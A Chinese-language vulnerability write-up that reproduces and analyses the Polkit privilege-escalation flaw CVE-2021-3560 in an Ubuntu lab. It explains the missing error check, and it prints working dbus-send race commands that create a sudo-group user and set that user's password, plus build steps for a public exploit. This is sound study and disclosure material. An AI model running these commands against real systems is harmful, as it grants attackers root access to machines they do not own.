CVE-2021-3560 Polkit权限提升漏洞复现与分析

0x00 简介

Polkit是Linux上的一个系统服务，其用于实现权限管理，通过给非特权进程授权，允许具有特权的进程（或者库文件lib）给非特权进程提供服务，由于Polkit被systemd使用，所有使用systemd的Linux发行版都会装有Polkit。

。

2021年06月03日，RedHat发布安全公告，修复了Linux Polkit中一个存在了7年的权限提升漏洞（CVE-2021-3560），该漏洞的CVSS评分为7.8，成功利用此漏洞的攻击者能够获得系统上的 root 权限。

0x01 漏洞概述

Polkit授权是通过服务进程polkitd来完成的，当非特权进程需要访问特权进程服务时，特权进程会通过 system message dbus 向 polkitd 请求权限认证。

Polkit 则会根据特权进程提供的信息和权限配置文件进行认证，认证完成后将认证结果返回给特权进程，特权进程会根据认证结果来决定是否给非特权进程提供服务。

而CVE-2021-3560漏洞时polkit服务上的身份验证绕过漏洞，允许非特权用户使用dbus调用特权方法，也就可以调用有账户服务提供的2个特权方法（CreatUser和SetPasswd），所以攻击者就可以调用这两个方法来创建一个超级用户。

0x02 影响版本

RHEL 8
Fedora 21 (or later)
Debian testing ("bullseye")
Ubuntu 20.04

函数polkit_system_bus_name_get_creds_sync用于获取请求操作的进程的uid和pid，该函数通过发送请求进程的唯一总线名称到 dbus-daemon 。这些唯一的名字有dbus-daemon来分配和管理，且该名称不能被伪造，所以这是一个很好的检查进程权限的方法。

而漏洞就产生于请求进程在调用 polkit_system_bus_name_get_creds_sync 之前就与 dbus-daemon 断开连接，导致该进程无法获得进程唯一的uid和pid，也就无法验证请求进程的权限。

0x03 环境搭建

1.下载Ubuntu20.04镜像；

http://releases.ubuntu.com/20.04/ubuntu-20.04.2.0-desktop-amd64.iso

2.在虚拟机上进行安装（可以选择Vmware Workstation），具体安装Ubuntu虚拟机步骤可以自行上网搜索；

3.安装完Ubuntu系统后自行安装必要软件；

sudo apt update
sudo apt install vim
sudo apt install gcc

在后续编译过程中可能会遇到如下编译问题

需要先安装libdbus，执行如下指令

sudo apt install libdbus-glib-1-dev

0x04 漏洞分析

Polkit的应用之一就是pkexec，pkexec与sudo类似，允许以root用户身份运行命令。如果在图形会话中运行pkexec，它将弹出一个对话框。如下图所示：

首先来看一下dbus-send命令执行期间涉及到的几个进程之间的关系，如下图所示：

其中虚线上方的 dbus-send 和 Authentication Agent 是非特权进程，虚线下方的 dbus-daemon、accounts-daemon 和 polkit 是特权进程。

当通过dbus创建新用户时，流程大致如下：

当 dbus-send 向 account-daemon 发起创建新用户的请求时，该请求会先发送到 dbus-daemondbus-daemon 再附加一个类似“1.96”这样的 dbus id到消息中然后将该请求消息发送给 account-daemon account-daemon 收到请求后向 polkit 询问该 dbus id 为 1.96 的连接是否具有权限polkit又向 dbus-daemon 询问该连接的 uid 如果 dbus-daemon 返回的 uid 为 0 ，polkit 就会立即对这个请求进行授权，否则 polkit 会向 Authentication agent 发送允许授权请求的管理员列表Authentication agent 会打开一个验证窗口验证用户输入的密码，并将密码发给 polkitpolkit 返回 True 给 account-daemonaccount-daemon 创建新用户

当 polkit 向 dbus-daemon 询问 dbus id 为 1.96 的连接的 UID 时，如果在 polkit 和 dbus-daemon 还在交互的时候此时该连接已断开，那就不存在这个连接，dbus-daemon就会返回错误。

而漏洞就存在于 polkit 处理从 dbus-daemon 返回的错误信息时，polkit 并没有拒绝该请求，反而将该连接视为 UID 为 0 的进程并授权。

漏洞代码如下：

/* every subject has a user; this is supplied by the client, so we rely* on the caller to validate its acceptability. */
user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,subject, NULL,error);
if (user_of_subject == NULL)goto out;/* special case: uid 0, root, is _always_ authorized for anything */
if (POLKIT_IS_UNIX_USER (user_of_subject) && polkit_unix_user_get_uid (POLKIT_UNIX_USER (user_of_subject)) == 0){result = polkit_authorization_result_new (TRUE, FALSE, NULL);goto out;}

以下是 polkit_authorization_result_new 函数原型：

PolkitAuthorizationResult *
polkit_authorization_result_new (gboolean is_authorized,gboolean is_challenge,PolkitDetails *details);

可以看到 polkit_backend_session_monitor_get_user_for_subject 函数虽然设置了 error 参数，但是在后面的代码中并未对 error 的情况进行校验处理，导致跳到了第二个if语句，且在 error 的时候能满足判断条件，执行 polkit_authorization_result_new (TRUE, FALSE, NULL) 授权成功。

以下是通过 dbus 指令来还原整个授权过程并给新创建的用户设置密码。

首先执行以下指令启动ssh服务，命令如下：

sudo service sshd start

通过ssh连接至本地，命令如下。

ssh username@127.0.0.1

此时在ssh连接的文本模式会话中执行pkexec就会启动文本模式验证。如下所示：

而dbus-send指令则可以从命令行触发polkit认证，dbus-send是发送D-Bus消息的工具，主要用于测试，比如模拟图形界面可能发送的创建新用户的指令，如果在文本模式会话中执行，则会立即失败，这是因为不同于pkexec，dbus-send不会启动自己的身份验证代理程序。如下图所示：

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:zeeker string:"Zeeker Security" int32:1

CVE-2021-3560漏洞是通过启动dbus-send命令并在polkit仍在处理请求的过程中杀死进程断开连接来触发的，所以要kill掉该进程我们首先需要测试一下执行dbus-send需要多长时间。执行以下指令：

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:zeeker string:"Zeeker Security" int32:1

执行后如下图所示：

可以看到，执行需要0.009秒，结果多次测试，平均需要11毫秒，最快是9毫秒，所以为了在成功执行dbus-send之前杀死该进程，我们需要在执行完这条指令后6毫秒执行kill指令。

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:zeeker string:"Zeeker Security" int32:1 & sleep 0.006s ; kill $!

执行后如下图所示：

几次执行可能都会失败，多执行几次，当一次执行成功后就可以看到zeeker用户已经成功创建，并且该用户在sudo组中，具有sudo权限。。

（如果执行了几十次上百次都不成功，请直接跳到下面的漏洞复现步骤用脚本进行尝试，如果无法复现，那么可能是测试的系统已经修复了这个漏洞）。

此时我们成功通过漏洞创建了一个用户，但是没有设置密码就无法登录，接下来我们尝试通过dbus来设置密码，但是dbus接口设置密码要通过散列值来设置，这里我们使用openssl来生成，执行以下指令（最后一个参数替换成你要设置的密码）：

openssl passwd -5 zeekersec

这里的 -5 参数是指定 sha256 算法来生成散列值，如果是 -6 就是 sha512，-1 就是 md5

执行后如下图，拿到密码对应的散列值，如图所示。

$5$.lkCAL3dgdW0pp4L$bA.aAAHBpnlJdDhaSAorFNE4vVKtoU1nGsxFsBNqRb7

现在结合这个散列值来给我们创建的用户设置密码，执行以下指令：

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1003 org.freedesktop.Accounts.User.SetPassword string:'$5$.lkCAL3dgdW0pp4L$bA.aAAHBpnlJdDhaSAorFNE4vVKtoU1nGsxFsBNqRb7' string:Whatever & sleep 0.006s ; kill $!

这里注意修改散列值和Userid，比如前面通过 id 指令查看用户id的时候就有显示用户id，这里自行修改指令中的 User1003 部分。

同样多执行几次，成功后就可以用之前设置的密码（这里是 zeekersec ）来进行登录了。如下图所示：

至此成功提权，可以以超级用户权限执行任意指令。

0x05 漏洞复现

1.下载POC

git clone https://github.com/hakivvi/CVE-2021-3560

2.使用以下指令编译 exploit.c

gcc -Wall exploit.c -o exploit $(pkg-config --libs --cflags dbus-1)

3.运行 exploit 程序。如下图所示：

可以看到已经成功创建了一个具有超级用户权限的无密码的pwned用户，可以直接以超级用户权限执行指令。如下图所示：

同时左边弹出了很多认证窗口，手动关闭即可

0x06 修复建议

参考各厂商对该漏洞的修复建议

RHEL 8：
https://access.redhat.com/security/cve/CVE-2021-3560

Fedora 21及更高版本：
https://bugzilla.redhat.com/show_bug.cgi?id=1967424

Debian testing (“bullseye”)：
https://security-tracker.debian.org/tracker/CVE-2021-3560

Ubuntu 20.04：
https://ubuntu.com/security/CVE-2021-3560